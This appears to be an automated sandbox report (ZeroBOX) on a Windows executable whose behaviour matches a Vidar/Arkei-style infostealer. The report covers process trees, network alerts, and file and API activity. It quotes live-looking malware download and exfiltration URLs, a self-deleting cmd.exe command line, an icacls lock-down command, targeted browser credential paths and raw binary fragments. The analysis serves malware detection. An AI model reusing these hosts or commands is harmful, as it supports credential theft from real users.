Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 19, 2021, 10:30 a.m.	July 19, 2021, 10:53 a.m.

Size	732.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`e6bf9a1d8f14d2e1f07976f93dfc554e`
SHA256	`20678f2e7e17e41244136f05f81ac066025b0575f4b34963ae4131cff9467602`
CRC32	`6A915660`
ssdeep	`12288:/CtcEB57sSlLMnZhPjDeFNFVdKhevnbfgy4:VEDTNmVjDYVdKhevbfgy4`
PDB Path	C:\zocatubewu\ficigeruja yopogexotuyuta\nutax.pdb
Yara	PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check IsPE32 - (no description) UPX_Zero - UPX packed file

build.exe "C:\Users\test22\AppData\Local\Temp\build.exe"
2440
- build.exe "C:\Users\test22\AppData\Local\Temp\build.exe"
  2524
  - icacls.exe icacls "C:\Users\test22\AppData\Local\057e0315-19ab-4b5f-ac0a-2ac31eb16c86" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    2664
  - build.exe "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask
    2720
    - build.exe "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask
      2800
      - build2.exe "C:\Users\test22\AppData\Local\5ea8b247-49da-4d2d-af5d-7a88dc570dd2\build2.exe"
        2920
        
        build2.exe "C:\Users\test22\AppData\Local\5ea8b247-49da-4d2d-af5d-7a88dc570dd2\build2.exe"
        2972
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\test22\AppData\Local\5ea8b247-49da-4d2d-af5d-7a88dc570dd2\build2.exe" & del C:\ProgramData\*.dll & exit
        2324
        
        taskkill.exe taskkill /im build2.exe /f
        2500
        
        timeout.exe timeout /t 6
        2680

Name	Response	Post-Analysis Lookup
astdg.top	A 211.170.70.237 A 190.167.36.80 A 115.91.217.231 A 190.190.202.13 A 124.109.61.160 A 58.235.189.190 A 109.102.255.230 A 190.107.133.19 A 58.228.68.101 A 187.177.183.85	211.170.70.237
api.2ip.ua	A 77.123.139.190	77.123.139.190
sslamlssa1.tumblr.com	A 74.114.154.18 A 74.114.154.22	74.114.154.22
securebiz.org	A 211.254.146.233 A 187.212.182.122 A 211.170.70.236 A 220.125.1.129 A 61.98.7.133 A 61.36.14.230 A 61.98.7.132 A 118.128.31.211 A 211.168.108.195 A 211.168.197.211	187.212.182.122

IP Address	Status	Action
115.91.217.231	Active	Moloch
116.202.183.50	Active	Moloch
164.124.101.2	Active	Moloch
61.36.14.230	Active	Moloch
74.114.154.22	Active	Moloch
77.123.139.190	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.102:57795 -> 164.124.101.2:53	2027026	ET POLICY External IP Address Lookup DNS Query (2ip .ua)	Device Retrieving External IP Address Detected
TCP 77.123.139.190:443 -> 192.168.56.102:49167	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.102:49165 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.102:49165 -> 77.123.139.190:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49165 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.102:49166 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.102:49175 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.102:49166 -> 77.123.139.190:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49175 -> 77.123.139.190:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49166 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.102:49175 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.102:49174 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.102:49174 -> 77.123.139.190:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49174 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 77.123.139.190:443 -> 192.168.56.102:49176	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.102:49185 -> 116.202.183.50:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.102:49184 -> 116.202.183.50:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.102:49179 -> 61.36.14.230:80	2002400	ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)	A Network Trojan was detected
UDP 192.168.56.102:58692 -> 164.124.101.2:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic
TCP 116.202.183.50:80 -> 192.168.56.102:49185	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.102:49179 -> 61.36.14.230:80	2020826	ET MALWARE Potential Dridex.Maldoc Minimal Executable Request	A Network Trojan was detected
TCP 116.202.183.50:80 -> 192.168.56.102:49184	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 61.36.14.230:80 -> 192.168.56.102:49179	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.102:49185 -> 116.202.183.50:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.102:49178 -> 115.91.217.231:80	2002400	ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)	A Network Trojan was detected
TCP 192.168.56.102:49185 -> 116.202.183.50:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.102:49178 -> 115.91.217.231:80	2023882	ET INFO HTTP Request to a *.top domain	Potentially Bad Traffic
TCP 192.168.56.102:49183 -> 74.114.154.22:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49185 -> 116.202.183.50:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.102:49185 -> 116.202.183.50:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.102:49185 -> 116.202.183.50:80	2025431	ET MALWARE Vidar/Arkei Stealer Client Data Upload	A Network Trojan was detected
TCP 192.168.56.102:49185 -> 116.202.183.50:80	2029236	ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil	Malware Command and Control Activity Detected
TCP 192.168.56.102:49185 -> 116.202.183.50:80	2029846	ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)	A Network Trojan was detected
TCP 192.168.56.102:49166 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.102:49175 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.102:49165 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.102:49174 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49183 74.114.154.22:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA	CN=*.tumblr.com	14:78:ba:5b:b5:54:5d:a1:2c:d2:79:4c:42:99:bb:3a:a9:db:86:c2

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 19, 2021, 10:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 19, 2021, 10:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 19, 2021, 10:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 19, 2021, 10:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 19, 2021, 10:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 19, 2021, 10:31 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 19, 2021, 10:30 a.m.			0	0
IsDebuggerPresent July 19, 2021, 10:31 a.m.			0	0
IsDebuggerPresent July 19, 2021, 10:31 a.m.			0	0

Command line console output was observed (3 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 19, 2021, 10:31 a.m.	buffer: SUCCESS: The process "build2.exe" with PID 2972 has been terminated. console_handle: 0x00000007	1	1
WriteConsoleW July 19, 2021, 10:31 a.m.	buffer: Waiting for 6 console_handle: 0x00000007	1	1
WriteConsoleW July 19, 2021, 10:31 a.m.	buffer: seconds, press a key to continue ... console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

C:\zocatubewu\ficigeruja yopogexotuyuta\nutax.pdb

Tries to locate where the browsers are installed (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 19, 2021, 10:31 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (9 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://116.202.183.50/517
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://116.202.183.50/freebl3.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://116.202.183.50/mozglue.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://116.202.183.50/msvcp140.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://116.202.183.50/nss3.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://116.202.183.50/softokn3.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://116.202.183.50/vcruntime140.dll
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://116.202.183.50/
suspicious_features	GET method with no useragent header	suspicious_request	GET https://sslamlssa1.tumblr.com/

Performs some HTTP requests (11 events)

request	GET http://astdg.top/nddddhsspen6/get.php?pid=CD20CF071BA7C05D5F5E6CAF42496E78&first=true
request	GET http://securebiz.org/dl/build2.exe
request	POST http://116.202.183.50/517
request	GET http://116.202.183.50/freebl3.dll
request	GET http://116.202.183.50/mozglue.dll
request	GET http://116.202.183.50/msvcp140.dll
request	GET http://116.202.183.50/nss3.dll
request	GET http://116.202.183.50/softokn3.dll
request	GET http://116.202.183.50/vcruntime140.dll
request	POST http://116.202.183.50/
request	GET https://sslamlssa1.tumblr.com/

Sends data using the HTTP POST Method (2 events)

request	POST http://116.202.183.50/517
request	POST http://116.202.183.50/

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

astdg.top

description

Generic top level domain TLD

Allocates read-write-execute memory (usually to unpack itself) (8 events)

Time & API	Arguments	Status
NtProtectVirtualMemory July 19, 2021, 10:30 a.m.	process_identifier: 2440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 598016 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009b0000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 19, 2021, 10:30 a.m.	process_identifier: 2440 region_size: 1159168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 19, 2021, 10:31 a.m.	process_identifier: 2720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 598016 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00920000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 19, 2021, 10:31 a.m.	process_identifier: 2720 region_size: 1159168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 19, 2021, 10:31 a.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74002000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 19, 2021, 10:31 a.m.	process_identifier: 2920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 409600 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00acc000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 19, 2021, 10:31 a.m.	process_identifier: 2920 region_size: 647168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 19, 2021, 10:31 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74002000 process_handle: 0xffffffff	1

Steals private information from local Internet browsers (3 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Chromium\User Data\Local State
file	C:\Users\test22\AppData\Local\Nichrome\User Data\Local State

Foreign language identified in PE resource (30 events)

name

RT_ICON

language

LANG_SERBIAN

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00519c20

size

0x00000468

name

RT_ICON

language

LANG_SERBIAN

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00519c20

size

0x00000468

name

RT_ICON

language

LANG_SERBIAN

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00519c20

size

0x00000468

name

RT_ICON

language

LANG_SERBIAN

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00519c20

size

0x00000468

name

RT_ICON

language

LANG_SERBIAN

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00519c20

size

0x00000468

name

RT_ICON

language

LANG_SERBIAN

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00519c20

size

0x00000468

name

RT_ICON

language

LANG_SERBIAN

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00519c20

size

0x00000468

name

RT_ICON

language

LANG_SERBIAN

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00519c20

size

0x00000468

name

RT_ICON

language

LANG_SERBIAN

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00519c20

size

0x00000468

name

RT_ICON

language

LANG_SERBIAN

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00519c20

size

0x00000468

name

RT_ICON

language

LANG_SERBIAN

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00519c20

size

0x00000468

name

RT_ICON

language

LANG_SERBIAN

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00519c20

size

0x00000468

name

RT_ICON

language

LANG_SERBIAN

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00519c20

size

0x00000468

name

RT_ICON

language

LANG_SERBIAN

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00519c20

size

0x00000468

name

RT_ICON

language

LANG_SERBIAN

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00519c20

size

0x00000468

name

RT_ICON

language

LANG_SERBIAN

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00519c20

size

0x00000468

name

RT_ICON

language

LANG_SERBIAN

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00519c20

size

0x00000468

name

RT_ICON

language

LANG_SERBIAN

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00519c20

size

0x00000468

name

RT_STRING

language

LANG_SERBIAN

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x0051fc38

size

0x0000029e

name

RT_STRING

language

LANG_SERBIAN

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x0051fc38

size

0x0000029e

name

RT_STRING

language

LANG_SERBIAN

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x0051fc38

size

0x0000029e

name

RT_STRING

language

LANG_SERBIAN

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x0051fc38

size

0x0000029e

name

RT_STRING

language

LANG_SERBIAN

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x0051fc38

size

0x0000029e

name

RT_STRING

language

LANG_SERBIAN

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x0051fc38

size

0x0000029e

name

RT_STRING

language

LANG_SERBIAN

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x0051fc38

size

0x0000029e

name

RT_ACCELERATOR

language

LANG_SERBIAN

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x0051a120

size

0x00000010

name

RT_ACCELERATOR

language

LANG_SERBIAN

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x0051a120

size

0x00000010

name

RT_GROUP_ICON

language

LANG_SERBIAN

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x0051a088

size

0x00000068

name

RT_GROUP_ICON

language

LANG_SERBIAN

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x0051a088

size

0x00000068

name

RT_GROUP_ICON

language

LANG_SERBIAN

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x0051a088

size

0x00000068

Creates executable files on the filesystem (7 events)

file	C:\ProgramData\freebl3.dll
file	C:\ProgramData\msvcp140.dll
file	C:\ProgramData\nss3.dll
file	C:\Users\test22\AppData\Local\5ea8b247-49da-4d2d-af5d-7a88dc570dd2\build2.exe
file	C:\ProgramData\vcruntime140.dll
file	C:\ProgramData\mozglue.dll
file	C:\ProgramData\softokn3.dll

Creates a suspicious process (2 events)

cmdline	C:\Windows\System32\cmd.exe /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\test22\AppData\Local\5ea8b247-49da-4d2d-af5d-7a88dc570dd2\build2.exe" & del C:\ProgramData\*.dll & exit
cmdline	"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\test22\AppData\Local\5ea8b247-49da-4d2d-af5d-7a88dc570dd2\build2.exe" & del C:\ProgramData\*.dll & exit

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\5ea8b247-49da-4d2d-af5d-7a88dc570dd2\build2.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\5ea8b247-49da-4d2d-af5d-7a88dc570dd2\build2.exe

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "build2.exe")

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 19, 2021, 10:31 a.m.	show_type: 0 filepath_r: C:\Windows\System32\cmd.exe parameters: /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\test22\AppData\Local\5ea8b247-49da-4d2d-af5d-7a88dc570dd2\build2.exe" & del C:\ProgramData\*.dll & exit filepath: C:\Windows\System32\cmd.exe	1	1	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (5 events)

Time & API	Arguments	Status	Return
Process32NextW July 19, 2021, 10:31 a.m.	snapshot_handle: 0x000002c4 process_name: pw.exe process_identifier: 2168	1	1
Process32NextW July 19, 2021, 10:31 a.m.	snapshot_handle: 0x000002c4 process_name: taskhost.exe process_identifier: 2216	1	1
Process32NextW July 19, 2021, 10:31 a.m.	snapshot_handle: 0x000002c4 process_name: build.exe process_identifier: 2800	1	1
Process32NextW July 19, 2021, 10:31 a.m.	snapshot_handle: 0x000002c4 process_name: build2.exe process_identifier: 2972	1	1
Process32NextW July 19, 2021, 10:31 a.m.	snapshot_handle: 0x000004b8 process_name: process_identifier: 1636140		0

An executable file was downloaded by the processes build.exe, build2.exe (7 events)

Time & API	Arguments	Status	Return
InternetReadFile July 19, 2021, 10:31 a.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $Þ"0C^ÐC^ÐC^ÐËÐC^ÐÝÐíC^Ð½%ÐC^ÐC_ÐçC^ÐÚÐ¸C^ÐÌÐC^ÐÊÐC^ÐÏÐC^ÐRichC^ÐPELÍÃc_à ^ÊXp@@`w« ÀkG4ad`^°ð_ ?@Ì.text\^ `.dataPìVpNb@À.rsrc°`^°@@.reloc:Mð_N> @BbgFg¾cÎcäcøcdd.dDdTdddtdd²dÂdÖdêdødee2eBePehe®ce°eÈeØeèeúef$f8fJf^fnfff¨f¾fÊfÞfôfgcc\|edcgg¬gÀgÌgägügh,hJhXhdhrh\|hhªhºhÒhÞhðhii&i8i@iNiZipii¢i¼iÖiäiòiþij(j>jXjdjnjjjjªjÀjÐjâjòjkk&k8kHkZknkzkkk®k(gF°¡F6ÏF2ÚFGÂF°[Ga¢F>}ì`Ux?x3bad allocationBoruka hipeturuhogrinakimuhuzafolujJalsisezarijetehotawuyofifegupunowegowuciduwubosuziwirafugurufojofebapuvajukernel32.dllLocalAllocVirtualProtect0%s %f %c0runexobozezçFFF8C8CX¡ÝãÌúä<1å ¼"°?'õü;Å<Ã¯&Ýb°?,kgüî<!Jÿ¢°?ÄeT1îá<1y"ã°?úzüç<¸F#±?VÂaì<$È lc±? £Ôx²à<Ònu£±?cÕv5ëà<åü¹ã±?0ýNà<¾ß¢â#²? ÁÁ"$Ø<b×md²?g¯QÆá<\|a7¤²?èéº¼Ü<a»cä²? 0H_ é<ÙÐ$³?]U ?È<8U¿d³?\|}}ó£?Õ<5ìï¤³?~+Üòá< å³?)0>¯BË<§'HR%´?«ÀI&³<^:Èe´?>!ÊÊè<slº¥´?eÃcb~qÏ<ÛÛ§ðå´?rªÜÊÂ<F§(&µ?ZönáÒ<'îÌ`fµ?4Ö7jâÀ<µÐã¦µ?+i³ÿ UÃ<ìoXÖæµ?Fï.K;×<í.'¶?YhüÅè<4lkQg¶?ö;+UÂç<3§¶?ÜÐ m8å<»ú&Òç¶?ëó«ùÌ<ÌS®(·?YÙ=ßt<:@¬Xh·?,än@4`í<°æ$¨·?ÛÑïñç<¶nåè·?þ9ðÜ®ß<-)¸?\ª»¿Ä<ÖÅwi¸?à¡éå=ï<Rè%Ã©¸?ýfØ@ÿ¥<Bê¸?aÉÙw¼ê<Gòò^¹?¯m(<÷æ<2;¯j¹? óP EÞ<«¹?<Ö/¨Üê<:¤Të¹?Ft¾§©<Í©+º?NibzPØ<lº?°ü %Xæ<aY¬º?]@ìº_}<önL³ìº?û¼G ¼<Ê1-»?aÜé¡(ï<UÏlm»?iT í?à<»Ì»?VãÏ×ú¶<w7H-î»?X[F´<Á+.¼?X knà<EÙôn¼?ÛT©(+å<ÆÞU[¯¼?ÖÔä<'ç¤Ãï¼?ju!4¸©<åÊ-0½?Ö¨÷¢ïá<QÌp½?ºå¿â<®µ¬±½?¶{Üë<qwñ½?_W¨äðÉ<Cé1¾?'ÆúÓ<I²µ\r¾?Ñí®DÌc<s>Ò²¾?Çé«ÖÒÁí<w¼Ió¾?²¥n'$Ä<à»2Ã3¿?z§¢ü7Ù<[¦>t¿?V-AiÔ×<Ãå¼´¿?`²DTbá< ;õ¿?S.è<TRÿÀ?)±RÄæÓ<2àøkÀ?,¬%ØÙä<rþÑ¬À?SC? Ý<HîìÀ?ZxgÌfåö<ð`/-Á?÷øó#ê<Þ7ÆmÁ?Çw¬ ß<æa®Á?_"àCÀþá<lX^ïÁ?¯@©ù<{Ð¥/Â?$¨8ò^õ<]hîNpÂ?b¼Xÿ<ó¥Éü°Â?©}_Ï¾<ºÆs¯ñÂ?÷ºpÊtô<hþf2Ã?·¢$µVî<Þ4{#sÃ?UÈùg ×<áûä³Ã?·w±³ê<J.«ôÃ?I Zöè<êOw5Ä?íý.@õ<îFHvÄ?N Ûåóç<¸!·Ä?ãj¿µöó<üv(ú÷Ä?¯zî"ë<iî6Û8Å??!½½ú<<ÆÁyÅ?G¬áoãð<éºÅ?ÃxeFÈ÷õ<ãè±ûÅ?ÔGùÿTÚâ<ó1<Æ?Væ Úù<îé{}Æ?¥å0¬Â<¯¢¾Æ?ÙÊýa@ÿ<ï¶ ÿÆ?¦0¥Á< ÌÌ¯@Ç?¡ ç1ú<â3öÄÇ?¨.aUâ<!±EàÂÇ?I¨ôÒ<ÑßÍÈ?ùÖÇ ·ãÑ<Àj¡)EÈ?Oþ´¬Áþ<IÓWÈ?W0Ýe)ó<uÇÈ?þ¢ç TÈ<©ËÇÉ?ÕÏÁ¤?ø<æX JÉ?!PO79ü<þ/¿QÉ?õ;éX¤ù<J]â ÌÉ?V:e:Ôñò<þQÕö Ê?ïWm¨Ü`Ï<b;«SOÊ?4Td'¦ô< Xw·Ê?ÐYÞü<øL"ÒÊ?d¹ôÝ©Sò<_}?Ë?·Txô<Æ[b UË?£\çz#÷<^ÉË?1¼¾ê<±NØË?ãwa¸ú<ù¦°¤Ì?ýêñN9þ<aàX;[Ì?½Y']ã<@ÌÙÌ?ÈîEê<VOuÞÌ?!SÃXô<b- Í?C²:áö<À\|âaÍ?B®<¯°$û<ç{É£Í?+Xê©UGé<mØ eåÍ?>UÛ×<åo]2'Î?¡IÙê<Ð ÌiÎ?GýÖ³Öá<àÞoåªÎ? ÛÚÎnÁ<9³[ËìÎ?é \|ä^Ç<¶¼¤¹.Ï?>oj¬Ó<.°_°pÏ?1Sð³Á÷<¸X¡¯²Ï?êÃlü<ó~·ôÏ?o.x²Ü÷<%3dÐ?ø½{=4 øLÐ?ËV!Å=bÎ#Ð?ð@g =aÑÐ?Gå¤z =]Æ°Ñ? 6 =oÚJVÑ?Jó ²b='4ôÑ?/µtÞ>á<wíÛÑ?aë`ÌÖ×ø<£_¯Ò?aÝ ®e=¿F``Ò?/úf =#&£Ò?5SmT4ø<W£æÒ?Rµz¯ï¹< Ñð(Ó? request_handle: 0x00cc0010	1	1
InternetReadFile July 19, 2021, 10:31 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Àð/AVAVAVéÒVAV]ó@WAV1VAV]óBWAV]óDWAV]óEWAV¦ñ@WAVOò@WAV@VÖAVOòBWAVOòEWÀAVOòAWAVOò¾VAVOòCWAVRichAVPELØbë[à"!Øf)Ýðp£s@pæPÀæÈ@xüÐPà0âTâ@ð8.texttÖØ `.rdataüþðÜ@@.data,HðÜ@À.rsrcx@à@@.relocàPä@B request_handle: 0x00cc000c	1	1
InternetReadFile July 19, 2021, 10:31 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÂU±É£;âÉ£;âÉ£;âÀÛ¨âÙ£;âWüâË£;âÁ8ãÇ£;âÁ?ãÂ£;âÁ:ãÍ£;âÁ>ãÛ£;âëÃ:ãÀ£;âÉ£:âw£;âÀ?ãÈ£;âÀ>ãÝ£;âÀ;ãÈ£;âÀÄâÈ£;âÀ9ãÈ£;âRichÉ£;âPELÄ_ë[à"!zà@3@A@Àt´Þ, xúÐ0h¹TT¹h¸@ôl¾.textÊxz `.rdata^ef~@@.data¼ä@À.didat8æ@À.rsrcx è@@.reloch0ì@B request_handle: 0x00cc000c	1	1
